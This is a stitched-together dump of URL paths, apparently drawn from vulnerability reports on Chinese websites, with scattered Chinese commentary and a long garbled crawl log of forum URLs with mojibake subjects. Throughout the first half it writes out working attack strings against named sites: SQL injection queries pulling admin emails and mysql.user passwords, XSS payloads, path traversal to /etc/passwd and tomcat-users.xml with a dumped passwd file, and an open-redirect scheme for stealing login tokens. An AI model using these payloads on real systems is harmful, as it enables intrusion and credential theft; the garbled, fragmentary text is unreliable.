/d1images/pb/pbv4.html?http://sina.allyes.com/main/adfclick?db=sina&bid=348530,407971,413284&cid=0,0,0&sid=410714&advid=11979&camid=66222&show=ignore&url=${}swf${}http://d3.sina.com.cn/201202/10/391898_750450ls_bt_0213.swf /jsp/x-qyhsztc/gyztc-1.jsp?sub_num=54-1-1&num=54-1&id=30018%20and%201=1 /jsp/x-qyhsztc/gyztc-1.jsp?sub_num=54-1-1&num=54-1&id=30018%20and%201=2 /content_detail.php?content_id=199 /content_detail.php?content_id=199 Y:% /content_detail.php?content_id=199%20aNd%201=2%20unIon%20all%20selEct%20concat%280x3a,email,0x3a,city,0x3a,login_time,province,ad_login_num,reg_time%29,2,3,4,5,6%20from%20rmail.ad_admin65%20limit%20268994,1%23 /news /vm /schedule /creative /vm/idx.jsp /auth/login /freeform/admin/user/login.jsp /admin/login.php /admin/login.jsp /pub/admin/index.asp /manage /wp-login.php /wp-login.php /newproduct/overlaydemo/login.html /manager/login/ /manager/login/ /admin.php admin /blog/?query=%3Cscript%3Ealert%28%27valo%27%29%3C%2Fscript%3E&pg=blogSearch&nid=72&so=0&bid=psYGxgamZwY%3D&so=0&submit=%E6%90%9C / /index.aspx /admin/Default.html /administrator/ /Info/default.aspx /index.aspx / /Online_PC/Uscript2.aspx?sid=146747 /login / /uwap-manager/layout/main.jsp / /showresumeinfo/?rid=26680744950240 /outsendresume/?id=26680744950240 /include/common/province_city.php?pid=10 /include/common/province_city.php?pid=10%20and%200%3C%3E(select%20count(*)%20from%20admin)可返回查询结果 / /index/newslist.php?category_id=2的注入漏洞和搜索引擎上发现的错误信息得知web路径,load_file读配置文件得到mysql用户及密码 /website.rar /data.rar /plus/add_rec.php?action=login&url={$adminHttpPath /users/userinfo.php?username=qiaofeiyu /users/userinfo.php?username=qiaofeiyu /users/userinfo.php?username=qiaofeiyu /skin/view.php?id=-111 /blog/blog_detail_infoshare.jsp?owernuin=1195202988&channel=0&back=false&dl=&backCount=0&feedcenter_pn=1&share_fs=0&sid=AVykuoOe4hjVcn0MY01gR4-N&ownerid=1329308187&count=20&B_UID=512523656&offset=0&opuin=454656134&share_uin=454656134&share_type=30&share_id=1329404884&bId=1329308187&type=all&ic=true /jxt/xxt/sjhdxx.jsp?id=2 /dtt/dtt_upload.php /test.php /cms/demo.php?pid=3075&from=874 /x/c/?RYtLCsIwEED3gnfwAs1njJAKg6AbFy68QZHp0EgzibSRHD925_LBg8cjtNAEbe99W9A6Y6BFBOd8CxhK_Zy1rrWqxJWnSVEWRUk.lzx_qei_724bBk4qFLmQDCKELNQN3Ro4xjVkmnkBY8GA9a.9biv3LHw1sNn.byM_3mk_HN0PA81 /city_detail.php?id=96 /mj10/jd/snews.asp?id=139 /market/kanwu/display2.asp?id=163 /viewnews.asp?id=260 /cs/2011pxsyc/home2-1-dt.asp?id=28 /Album/other/sfgundong_hz_china.aspx?url=p /gwy2010/index.php?p=1&sid=&fromid=&a=%E5%AE%81%E6%B3%A2%E5%87%BA%E5%85%A5%E5%A2%83%E6%A3%80%E9%AA%8C%E6%A3%80%E7%96%AB%E5%B1%80&action=column&type=3&wv=2 /comments.php?au=395389&wv=2&v=s&iv=zh&fromid=&p=4&un=5Y2X5p6B5LuZ57%20B&bid=19535 /comments.php?au=395389&wv=2&v=s&iv=zh&fromid=&p=1&un=5Y2X5p6B5LuZ57%20B&bid=19281 /vnet_news_vote.php?vt=c&sid=&chid=1_14_3&cnid=1249241&p=1&wv=2&coid=1_14_3_1&v=&fromid=765 /newsView.php?f=f&wv=2&sid=&chid=1_11&coid=1_11_9&cnid=1265128&fromid=765&p=1 /newsView.php?fromid=765&p=1&f=f&wv=2&sid=&chid=1_8&coid=1_8_12&cnid=1265977 /zone/luchuan/ajax/specialservice.php?app=survey&id=1&userid=58084511&jsoncallback= /cards/senddrawshow.do?cardId= /medal/getmedaljsonp.do?sid=ZAujqBPBgXfmMXGbTPBBmaskmPZMgALt&uid=rehat@163.com&from=webmail&p=0&callback= /medal/task/signinframe.do?from= /medal/getmedaljsonp.do?sid=ZAujqBPBgXfmMXGbTPBBmaskmPZMgALt&uid=rehat@163.com&from=webmail&p=0&callback=%2B%2Fv9%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg- /index.php?goto= /1.php /thread-2635628-1-1.html /index.php?appid=2&goto=http://bbs.xiaomi.com/thread-2635628-1-1.html登录,就会自动跳转到http://bbs.xiaomi.com/thread-2635628-1-1.html&token=...这个帖子,如果用户点击链接就会跳转到http://127.0.0.1/1.php,那么我就可以用1.php对用户的来源进行追踪。 1.php*/ /thread-2635628-1-1.html&token= /img.php#1.php /index.php?appid=2&goto=http://bbs.xiaomi.com/thread-2635628-1-1.html登录,那么浏览器就会自动加载图片,我们就可以用img.php对用户进行追踪,并且不用用户点击链接就可以直接获取用户的TOKEN,这个就比方法1严重得多了 img.php*/ image/png /re?url=...那么我们就可以用http://passport.xiaomi.com/index.php?appid=2&goto=http://www.xiaomi.com/re?url=...进行二次跳转,TOKEN依然可以追踪,并且可以钓鱼 /上存在nginx解析漏洞,nginx未打补丁 www.xiaomi.com/“吗??? /birt/frameset?__report=test.rptdesign'&sample=my+parameter birt.war/test.rptdesign /brand/key.php?key=%E9%9D%A2%E8%86%9C&b=918 /member/index_do.php?fmdo=user&dopost=regnew alert /DownloadFile?type=full&file=/../../../../../../../../../etc/passwd /ActivityCalendar.rar /5107/upload/uploadFlash.php /show/12969.html /5107/upload/uploadFlash.php /spbbs/images/ /spbbs/admin/ /register/register.htm?oauth_token=ReqTk1024429798630682&oauth_callback=http://mail.aliyun.com/uniquelogin.htm /portal/web/GetMesPwdIndexAction.do /aaa.php /test1.php /phpinfo.php三个页面内容一样 /pic/?a=cate&id=23 /fckeditor/editor/filemanager/connectors/test.html /img/baidu_logo.gif /xss.js /Reports。当然一般管理机都在内网,这个可在内网渗透的时候做一点参考使用。 /thread-100507-1-1.html一文二楼评论中代码指向http://ll.ninth.biz/tc.swf /av.htm /index.jsp%20 /common/ /jsp/ http://www.acc.gov.cn/filemanager/upfile/image/2011120511025542.jsp /#q=inurl:*backupdata*dede_admin&hl=zh-CN&newwindow=1&safe=strict&prmd=imvns&ei=U_dCT7WpOIe9iAe1qpDlBA&start=10&sa=N&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=1fcd94471d9bb062&biw=1280&bih=659 /ucHome/space.php?uid=150 /ucHome/space.php?uid=318 /kx/clientveiw.jsp?id=1 /LTGeneral/tvgame/85011paiweb116/welcome.php /然后很顺利的看到了新浪的短信后台什么的,在点点,发现了数据库的dump文件, /zhuanti/daonian.rar /news/jiangmin/todayinfo.rar /images.zip /zhuanti/kv2008.rar /BuyProducts.rar /forum/list.php?type=search&ktype=3&word=%B6%DF%C0%B2A%C3%CE /1253200/Perclerk/sendsmscode.asp?telno=手机号 /addNotify.action?id=";}}alert("xss") /all/38 /shiyong/goodsdetail.php?id=80 /portal/zh_CN/upload/File/PSBC-Mobile/login/login.html /admin/ /Flash/stat_hits.php?itemid=6717 /sdodownload/passport/SNDAHomepage.rar /kf.rar /news/ns.rar /userweb.rar //Pay/CashPromotion.rar /login-queue/rest/queue/cancelQueue/10000%3cbody%20onload=javascript:alert(%22test-it,can-be-write-anyone-xss-lol~%22)%3e /data/asia_cups/player.php?id=15 /detail.php?id=15 /admin/login.php sohu.com club /jimmy.php /jimmy.php /jimmy.php /jimmy.php /jimmy.php /phpinfo.php /.svn/entries /updatesmall.php /awstats/awstats.pl?config=3g.mop.com&year=2012&month=2&day=25 /gzlr/Article/ShowArticle.asp?title=单位简介 /info_view.asp?id=18 /WEB/myekt.aspx /WEB/searchnews.aspx?cid=46 /WEB/newsdetail.aspx?nid=222 /WEB/businessinde.aspx?sid=16 /WEB/login.aspx)泄露。 /kns55/index.aspx /backend.php/interface/print/user_id/186863/talentTypeId/20 /backend.php/interface/export/user_id/186864/talentTypeId/20 /!tagjoblist/_job_tag_id/1/job_id/10330%20and%20exists%28select%20*%20from%20mysql.user%29%23/ /extmail/cgi/env.cgi /simp/news.php?news_id=39 /admin/index.php /wiki/index.php /cms/common/filechooseold/browser.jsp?webapppath=../htdocs/web/&uploadpath=/ /cms/common/filechooseold/browser.jsp?webapppath=../htdocs/web/&uploadpath=/ / /readimagexs.aspx?xh=88888888的形式读取 /cjz/news_view.php?id=190 /cjz/news_list.php?type=zhuanzhe /cjz/news_list.php?type=zhuanzhe /config/ /sitemap_index.xml /report.php?rid=-6574+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat_ws /video.php?id=-8864+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,concat_ws /photo.php?album_id=-2620+UNION+ALL+SELECT+concat_ws x:0:0:root:/root:/sbin/nologin x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:37:37::/var/lib/rpm:/sbin/nologin x:81:81:System /:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:65534:65534:Anonymous /var/lib/nfs:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:42:42::/var/gdm:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:27:27:MySQL /var/lib/mysql:/bin/bash x:501:48::/home/wangwanyou:/bin/bash /login/ /login/xcl0ud /userinfo.php /cgi-bin/cgi_rss_out?uin=54450919 /Ezine.php?id=1 /Ezine.php?id=1 /report/news/info.jsp?id=61 /report/login.jsp /search.php?goods_id=122079535[SQLi /article.php?article_id=220[SQLi /goods_kinds.php?act=list&cat_id=50020211[SQLi /help.php?act=search_article&article_id=91[SQLi /buy_now.php?act=StartOrder&store_id=[SQLi /goods_show.php?sku_id=13467&apple_id=[SQLi /search.php?act=list&key=[SQLi /groupbuy.php?act=index&shop_id=1000[SQLi /help.php?act=search_article&article_id=91[SQLi /article.php?article_id=220[SQLi /ml/index.php?id=013 /cw.do?actions=infoList&channel=3&columns=2 /user/login /20100725/admin/Login.asp?act=Login /ad_alt_js.php?zoneid=678 /ad_multibyid.php?zoneid=1 /ad_alt_click.php?z=227&b=230%5C /ad_alt_js.php?zoneid=1 /tips/goodbaby/serials/default.php?topic_id=5&chapter_id=14&article_id=6817 /consumable/_c/consumable_list.php?ID=3[SQLi /consumable/_c/products_list.php?ID=1[SQLi /consumable/_c/products_item.php?ID=15[SQLi /consumable/_c/consumable_detail.php?ID=3[SQLi /school_show.php?college_id=96+/*!and*/+1=2+/*!uNioN*/+/*!seLecT*/+1,user_name,3,4,user_pwd,6,7,8,9,10,11,12,13,14+/*!from*/+admin /content.php?id=1253+/*!aND*/1=2+/*!uNion*/+/*!select*/+1,2,3,4,5,6,SCHEMA_NAME,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+/*!from*/+information_schema.schemata+limit /school/schindex.php?id=4328+/*!aND*/1=2+/*!uNion*/+/*!select*/+1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12,13,14,15,16,17+/*!from*/+information_schema.TABLES+/*!where*/+TABLE_SCHEMA=0x7A6478786A68+limit /contact.php?provinceid=2 /contact.php?provinceid=2 /templates/ /images/ /data/ /include/等等各种遍历。 /chat/index.php?id=22 /info/search.php?catid=831&search=1&keywords=88952634 /userteam.php?team_no=NTe008就存在sql注入漏洞 0:number 0:age 0:evicted 0:evicted_nonzero 0:evicted_time 0:outofmemory 0:tailrepairs 0:reclaimed 1:number 1:age 1:evicted 1:evicted_nonzero 1:evicted_time 1:outofmemory 1:tailrepairs 1:reclaimed /reg/?src=wan&t=wan&v=1&tpl= /admin/login.jsp php:111 /index.php?controller=user&action=login /index.php /index.php /static/images/android.gif/x.php /phpfolder/src/in/report/logview/logview.php?filename=4477270_20111109_20111110140150.html&path=miliao /account/del /active/telrate/login /activity/mcdonalds / /user/chgpass/username/{target /2012ct4s/index.php?ca=B /mingr.php /gongh.php /meir.php /fuh.php /plp.php /aqrj.php /votelog.php?classify=2 /admin/editubb/eWebEditor.asp?id=2 /StdSP_OP_LOG/2011-09-30-StdSP_OP_LogInfo.log /SMPSaaSPay1_log/2012-03-04-PortalPay_LogInfo.log /baby.tar.gz /robots.txt%00.php /wow/tw/itemsets.html?su=46 /wow/cn/items.html?minle=85 /ucbrowser/images/logo.png/guest.php /ucbrowser/images/logo.png/guest.php /team/index.php?filter=true&keyword=qqqq返回空 /team/index.php?filter=true&keyword=qqqq'+or%20'1'='依然返回空 /team/index.php?filter=true&keyword=qqqq'+or%20'%'='返回数据 /team/index.php?filter=true&keyword=qqqq'+or%200%3E0+or%20'1'='返回空 /team/index.php?filter=true&keyword=qqqq'+or%201%3E0+or%20'1'='返回数据 /team/index.php?filter=true&keyword=qqqq'+or%20(select%201)%3E0+or%20'1'= appkey=2043051649 /share/share.php?c=spr_web_bd_tudou_weibo&url=http%3A%2F%2Fwww.tudou.com%2Fprograms%2Fview%2FL5PVW-u0ewE%2F%3FresourceId%3D0_03_05_02&title=%E3%80%8A%E6%AF%81%E5%AE%B9%E5%B0%91%E5%A5%B3%E8%BF%9B%E4%BA%AC%E6%B2%BB%E7%96%97%E3%80%8B+%EF%BC%88%E5%8F%AF%E9%80%89%E5%8E%9F%E7%94%BB%E6%B8%85%E6%99%B0%E5%BA%A6%EF%BC%89&source=%E5%9C%9F%E8%B1%86%E7%BD%91&sourceUrl=http%3A%2F%2Fwww.tudou.com%2F&content=gb2312&pic=http%3A%2F%2Fi2.tdimg.com%2F122%2F452%2F239%2Fp.jpg&appkey=2043051649&ralateUid=1692113870 /1829851507/y8DfIdTWT /12530/登陆的时候选取动态密码。然后就可以无限点了! /info/index.php http://www.greenet.cn/ http://zj.greenet.cn/ /tool.aspx(可能是程序员来用于调试的吧!) info_cont.asp /user/classroom/.svn/entries /download.jsp?filename=../WEB- /download.jsp?filename=../../../conf/tomcat-users.xml /download.jsp?filename=../index.jsp /download.jsp?filename=../WEB-INF/classes/db/Dbhelper.class /projector/cgfa/index.php?categoryId=1%29%20%20as%20c%20on%20c.articleId=a.id%20where%20%28select%20@@version%29=1-- /oa/news/?categoryId=1xx /active.php?ac=5%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20concat%280x7c,user,0x7c,password,0x7c,host%29%29%20from%20mysql.user%20limit%206,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 /admin/tpl/action.htm /admin/tpl/ /pages/default.asp /poem/index.php?_c=poet&_a=list&country=foreign&era=%E6%B3%95%E5%9B%BD /oa/pandian/index.php /solution/solutionList.php /fangan/index.php /list/product/index.php /writinglive/more.php /xzx/more_gz.php /v2/api/?getapi&class= /v2/api/?getapi&class=login&tpl= /jishigou30s/index.php?mod=settings&code=face /posts/2012/03/05/github-hacked-rails-security/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed /news.jsp?id=301 /news.jsp?id=302 /interview/view.php?tid=13 /interview/view.php?tid=13 /%80../%80../%80../%80../%80../%80../windows/win.ini /auth.do?id= /bbs/user/whatsnew?ct= /bbs/topic/21232194?ct= /bbs/topic/22217955?ct= /bbs/topic/22371419?ct= /bbs/topic/22365183?ct= /bbs/topic/22351725?ct= /bbs/topic/22351098?ct= /bbs/topic/22372447?ct= /bbs/topic/22340224?ct= /bbs/topic/22332057?ct= /bbs/topic/22357296?ct= /bbs/topic/22184933?ct= /bbs/topic/22315564?ticket= /bbs/topic/22315564?ticket=ST-2389757-cLdwoXqKigjuzG3ziYrsWmsFQ0xxRCQThP0-20&ct= /bbs/topic/22344120?ct= /bbs/topic/22310253?ct= /bbs/topic/22311341?ct= /bbs/topic/22337453?ct= /bbs/topic/22142517?ct= /bbs/topic/22226481?ct= /bbs/topic/22330911?ct= /bbs/topic/22316397?ct= /bbs/topic/22259808?ct= /bbs/topic/22339359?ct= /bbs/topic/22337456?ct= /bbs/topic/21821850?ct= /bbs/topic/22355880?ct= /bbs/topic/22275492?ct= /bbs/topic/22162468?ct= /bbs/topic/22264490?ct= /bbs/topic/22097159?ct= /bbs/topic/22246286?ct= /bbs/topic/22348669?ct= /bbs/post/page?bid=87&sty= /bbs/thread/22215237?ct= /bbs/thread/22189111?ct= /bbs/thread/22189637?ct= /bbs/topic/22316902?ct= /bbs/post/page?bid=87&sty=1&age= /bbs/post/page?bid=87&sty=1&age=30&ct= /bbs/post/page?bid=47&sty= /bbs/thread/21648961?ct= /bbs/thread/21605883?ct= /bbs/thread/21608785?ct= /bbs/post/page?bid=47&sty=1&age= /bbs/post/page?bid=47&sty=1&age=30&ct= /bbs/post/page?bid=50&sty= /bbs/post/page?bid=50&sty=1&age= /bbs/post/page?bid=50&sty=1&age=30&ct= /bbs/thread/22349098?ct= /bbs/thread/22346276?ct= /bbs/post/page?bid=45&sty= /bbs/thread/22317013?ct= /bbs/thread/22322726?ct= /bbs/thread/22337310?ct= /bbs/thread/22339991?ct= /bbs/post/page?bid=45&sty=1&age= /bbs/post/page?bid=45&sty=1&age=30&ct= /bbs/thread/22234903?ct= /bbs/thread/22237921?ct= /bbs/thread/22240160?ct= /bbs/thread/22283616?ct= /bbs/thread/22217096?ct= /bbs/thread/22289069?ct= /bbs/thread/22283473?ct= /bbs/post/page?bid=10&sty= /bbs/thread/22054244?ct= /bbs/thread/22123968?ct= /bbs/thread/22247435?ct= /bbs/thread/22239982?ct= /bbs/thread/22088116?ct= /bbs/thread/22272143?ct= /bbs/post/page?bid=92&tpg= /bbs/post/page?bid=10&sty=1&age= /bbs/post/page?bid=92&tpg=3&s= /bbs/post/page?bid=10&sty=1&age=30&ct= /bbs/post/page?bid=92&tpg=3&s=0&age= /bbs/thread/22134495?ct= /bbs/thread/22217739?ct= /bbs/thread/22067131?ct= /bbs/post/page?bid=92&tpg=3&s=0&age=0&order= /bbs/post/page?bid=92&tpg=3&s=0&age=0&order=0&ct= /bbs/post/page?bid=46&sty= /bbs/post/page?bid=46&sty=1&age= /bbs/post/page?bid=46&sty=1&age=30&ct= /detail/2468703?username= /detail/2468703?username=wangminchao&bid= /detail/2468703?username=wangminchao&bid=46&subject= /detail/2468703?username=wangminchao&bid=46&subject=缂鸿鎬у崚涓鍘嬫帶鍒舵柊灞曟湜鈥斺€�2011&csrfToken= /detail/2468703?username=wangminchao&bid=46&subject=缂鸿鎬у崚涓鍘嬫帶鍒舵柊灞曟湜鈥斺€�2011&csrfToken=9bebcaa8-f330-4199-a9a4-ec5d42143de3&action= /bbs/thread/22250738?ct= /detail/2468703?username=wangminchao&bid=46&subject=缂鸿鎬у崚涓鍘嬫帶鍒舵柊灞曟湜鈥斺€�2011&csrfToken=9bebcaa8-f330-4199-a9a4-ec5d42143de3&action=Delete&fileId= /bbs/thread/22220243?ct= /bbs/thread/22223120?ct= /detail/2468703?username=wangminchao&bid=46&subject=缂鸿鎬у崚涓鍘嬫帶鍒舵柊灞曟湜鈥斺€�2011&csrfToken=9bebcaa8-f330-4199-a9a4-ec5d42143de3&action=Delete&fileId=0&limit= /bbs/post/page?bid=146&sty= /bbs/thread/22170049?ct= /bbs/thread/22108915?ct= /bbs/thread/22177339?ct= /bbs/post/page?bid=146&sty=1&age= /bbs/post/page?bid=146&sty=1&age=30&ct= /bbs/thread/22080946?ct= /bbs/thread/22080560?ct= /bbs/thread/22302472?ct= /bbs/thread/22080786?ct= /bbs/thread/22096910?ct= /bbs/thread/22332340?ct= /bbs/thread/22315278?ct= /bbs/post/page?bid=15&sty= /bbs/post/page?bid=15&sty=1&age= /bbs/post/page?bid=15&sty=1&age=30&ct= /bbs/?ct= /bbs/thread/22352614?ct= /bbs/thread/22355470?ct= /bbs/post/page?bid=114&sty= /bbs/thread/22325695?ct= /bbs/thread/22325271?ct= /bbs/thread/22330620?ct= /bbs/thread/22197931?ct= /bbs/thread/22361535?ct= /bbs/thread/22318746?ct= /bbs/thread/22330481?ct= /bbs/thread/21973722?ct= /bbs/post/page?bid=114&sty=1&age= /bbs/post/page?bid=114&sty=1&age=0&ct= /bbs/topic/18756019?done= /bbs/topic/18756019?done=/bbs/topic/18756019&ct= /bbs/topic/22104390?done= /bbs/topic/22108917?done= /bbs/topic/22197088?done= /bbs/topic/22138533?done= /bbs/topic/22104390?done=/bbs/topic/22104390&ct= /bbs/topic/22108917?done=/bbs/topic/22108917&ct= /bbs/topic/22097072?done= /bbs/topic/22197088?done=/bbs/topic/22197088&ct= /bbs/topic/22130397?done= /bbs/topic/22105488?done= /bbs/topic/22086394?done= /bbs/topic/22097072?done=/bbs/topic/22097072&ct= /bbs/topic/22118384?done= /bbs/topic/22138533?done=/bbs/topic/22138533&ct= /bbs/topic/22111245?done= /bbs/topic/22130397?done=/bbs/topic/22130397&ct= /bbs/topic/22086394?done=/bbs/topic/22086394&ct= /bbs/topic/22105488?done=/bbs/topic/22105488&ct= /bbs/topic/22118384?done=/bbs/topic/22118384&ct= /bbs/topic/22111245?done=/bbs/topic/22111245&ct= /search?done= /search?done=/bbs/file/search&ct= /limitedTime?done= /ranking?done= /detail/4009168?username= /detail/2467959?username= /detail/2475896?username= /detail/4007323?username= /uploads?done= /detail/2463701?username= /ranking?done=/bbs/file/ranking&ct= /limitedTime?done=/bbs/file/limitedTime&ct= /detail/4009168?username=涓崕娑堝寲鏉傚織&bid= /detail/2467959?username=binpda&bid= /detail/4007323?username=hotstone&bid= /detail/2475896?username=鍏夊厜鍐�&bid=58&subject= /detail/4042029?username= /uploads?done=/bbs/file/uploads&ct= /detail/2463701?username=guodanni&bid= /detail/4042022?username= /detail/4009168?username=涓崕娑堝寲鏉傚織&bid=188&subject= /detail/4042032?username= /detail/2467959?username=binpda&bid=80&subject= /detail/4007323?username=hotstone&bid=50&subject= /detail/4042029?username=liudehua1234024&bid= /detail/2475896?username=鍏夊厜鍐�&bid=58&subject=鍗敓閮ㄣ€婇绠$檶璇婃不鎸囧崡銆嬶紙2011鐗堬級&csrfToken= /detail/2463701?username=guodanni&bid=80&subject= /detail/4009168?username=涓崕娑堝寲鏉傚織&bid=188&subject=浜氬お鍦板尯闈為潤鑴夋洸寮犳€т笂娑堝寲閬撳嚭琛€涓撳鍏辫瘑鎰忚瑙h锛堜竴銆佷簩锛�&csrfToken=f5752d2b-44e9-4527-b5c2-3bf1d5ca5281&action= /detail/4042032?username=zhn926&bid= /detail/4042022?username=wanggxy28&bid= /detail/4042029?username=liudehua1234024&bid=131&subject= /detail/2467959?username=binpda&bid=80&subject=鏅掓檼鎴戜腑鏍囩殑鍑犱唤鍥藉鑷劧绉戝鍩洪噾鏍囦功&csrfToken= /detail/4007323?username=hotstone&bid=50&subject=2012AAOS浼氳鎽樿&csrfToken= /detail/4042020?username= /detail/2475896?username=鍏夊厜鍐�&bid=58&subject=鍗敓閮ㄣ€婇绠$檶璇婃不鎸囧崡銆嬶紙2011鐗堬級&csrfToken=62f3a31c-8636-42c4-86dc-c74653b0377d&action= /detail/2463701?username=guodanni&bid=80&subject=鍥藉鑷劧鍩洪噾鐢宠涔﹀啓浣滆娉ㄦ剰鐨勫嚑涓棶棰�&csrfToken=78393a5a-9976-49f9-b4b9-2276ee247c92&action= /detail/4009168?username=涓崕娑堝寲鏉傚織&bid=188&subject=浜氬お鍦板尯闈為潤鑴夋洸寮犳€т笂娑堝寲閬撳嚭琛€涓撳鍏辫瘑鎰忚瑙h锛堜竴銆佷簩锛�&csrfToken=f5752d2b-44e9-4527-b5c2-3bf1d5ca5281&action=Delete&fileId= /detail/4042032?username=zhn926&bid=137&subject= /detail/4042029?username=liudehua1234024&bid=131&subject=2007鑽晱杩涗慨绉�-鐜嬭緣&csrfToken= /detail/4007323?username=hotstone&bid=50&subject=2012AAOS浼氳鎽樿&csrfToken=593117b1-1c69-4653-a099-42f29892ae32&action= /detail/4042022?username=wanggxy28&bid=137&subject= /detail/2475896?username=鍏夊厜鍐�&bid=58&subject=鍗敓閮ㄣ€婇绠$檶璇婃不鎸囧崡銆嬶紙2011鐗堬級&csrfToken=62f3a31c-8636-42c4-86dc-c74653b0377d&action=Delete&fileId= /detail/4009168?username=涓崕娑堝寲鏉傚織&bid=188&subject=浜氬お鍦板尯闈為潤鑴夋洸寮犳€т笂娑堝寲閬撳嚭琛€涓撳鍏辫瘑鎰忚瑙h锛堜竴銆佷簩锛�&csrfToken=f5752d2b-44e9-4527-b5c2-3bf1d5ca5281&action=Delete&fileId=0&limit= /detail/2463701?username=guodanni&bid=80&subject=鍥藉鑷劧鍩洪噾鐢宠涔﹀啓浣滆娉ㄦ剰鐨勫嚑涓棶棰�&csrfToken=78393a5a-9976-49f9-b4b9-2276ee247c92&action=Delete&fileId= /detail/4007323?username=hotstone&bid=50&subject=2012AAOS浼氳鎽樿&csrfToken=593117b1-1c69-4653-a099-42f29892ae32&action=Delete&fileId= /detail/4042020?username=jiaqing5604128&bid= /detail/4042032?username=zhn926&bid=137&subject=鏂扮敓鍎挎憾琛€鐥�&csrfToken=ec716f6d-3b36-4dd4-9cf4-11b1d340024b&action= /detail/2475896?username=鍏夊厜鍐�&bid=58&subject=鍗敓閮ㄣ€婇绠$檶璇婃不鎸囧崡銆嬶紙2011鐗堬級&csrfToken=62f3a31c-8636-42c4-86dc-c74653b0377d&action=Delete&fileId=0&limit= /detail/4042029?username=liudehua1234024&bid=131&subject=2007鑽晱杩涗慨绉�-鐜嬭緣&csrfToken=986d0446-853a-4215-8d75-494e3825960b&action= /detail/2467959?username=binpda&bid=80&subject=鏅掓檼鎴戜腑鏍囩殑鍑犱唤鍥藉鑷劧绉戝鍩洪噾鏍囦功&csrfToken=b27fa8dd-a778-44c9-8797-e5a6e431404c&action= /detail/4042022?username=wanggxy28&bid=137&subject=鎴戝浗鍎跨鎬ユ晳浣撶郴寤鸿鐜扮姸涓庡彂灞曟€濊€�&csrfToken=aae693cf-2b28-4fea-990d-dc1b4019894e&action= /detail/2463701?username=guodanni&bid=80&subject=鍥藉鑷劧鍩洪噾鐢宠涔﹀啓浣滆娉ㄦ剰鐨勫嚑涓棶棰�&csrfToken=78393a5a-9976-49f9-b4b9-2276ee247c92&action=Delete&fileId=0&limit= /detail/4042032?username=zhn926&bid=137&subject=鏂扮敓鍎挎憾琛€鐥�&csrfToken=ec716f6d-3b36-4dd4-9cf4-11b1d340024b&action=Delete&fileId= /detail/4042029?username=liudehua1234024&bid=131&subject=2007鑽晱杩涗慨绉�-鐜嬭緣&csrfToken=986d0446-853a-4215-8d75-494e3825960b&action=Delete&fileId= /detail/4042020?username=jiaqing5604128&bid=46&subject= /detail/2467959?username=binpda&bid=80&subject=鏅掓檼鎴戜腑鏍囩殑鍑犱唤鍥藉鑷劧绉戝鍩洪噾鏍囦功&csrfToken=b27fa8dd-a778-44c9-8797-e5a6e431404c&action=Delete&fileId= /detail/4007323?username=hotstone&bid=50&subject=2012AAOS浼氳鎽樿&csrfToken=593117b1-1c69-4653-a099-42f29892ae32&action=Delete&fileId=0&limit= /detail/4042022?username=wanggxy28&bid=137&subject=鎴戝浗鍎跨鎬ユ晳浣撶郴寤鸿鐜扮姸涓庡彂灞曟€濊€�&csrfToken=aae693cf-2b28-4fea-990d-dc1b4019894e&action=Delete&fileId= /detail/4042032?username=zhn926&bid=137&subject=鏂扮敓鍎挎憾琛€鐥�&csrfToken=ec716f6d-3b36-4dd4-9cf4-11b1d340024b&action=Delete&fileId=0&limit= /detail/4042020?username=jiaqing5604128&bid=46&subject=鏉ュ緱鏃�&csrfToken=bec9291b-18a4-4e70-aa2d-520d8d1466e9&action= /detail/4042022?username=wanggxy28&bid=137&subject=鎴戝浗鍎跨鎬ユ晳浣撶郴寤鸿鐜扮姸涓庡彂灞曟€濊€�&csrfToken=aae693cf-2b28-4fea-990d-dc1b4019894e&action=Delete&fileId=0&limit= /detail/4042029?username=liudehua1234024&bid=131&subject=2007鑽晱杩涗慨绉�-鐜嬭緣&csrfToken=986d0446-853a-4215-8d75-494e3825960b&action=Delete&fileId=0&limit= /detail/4042020?username=jiaqing5604128&bid=46&subject=鏉ュ緱鏃�&csrfToken=bec9291b-18a4-4e70-aa2d-520d8d1466e9&action=Delete&fileId= /detail/2467959?username=binpda&bid=80&subject=鏅掓檼鎴戜腑鏍囩殑鍑犱唤鍥藉鑷劧绉戝鍩洪噾鏍囦功&csrfToken=b27fa8dd-a778-44c9-8797-e5a6e431404c&action=Delete&fileId=0&limit= 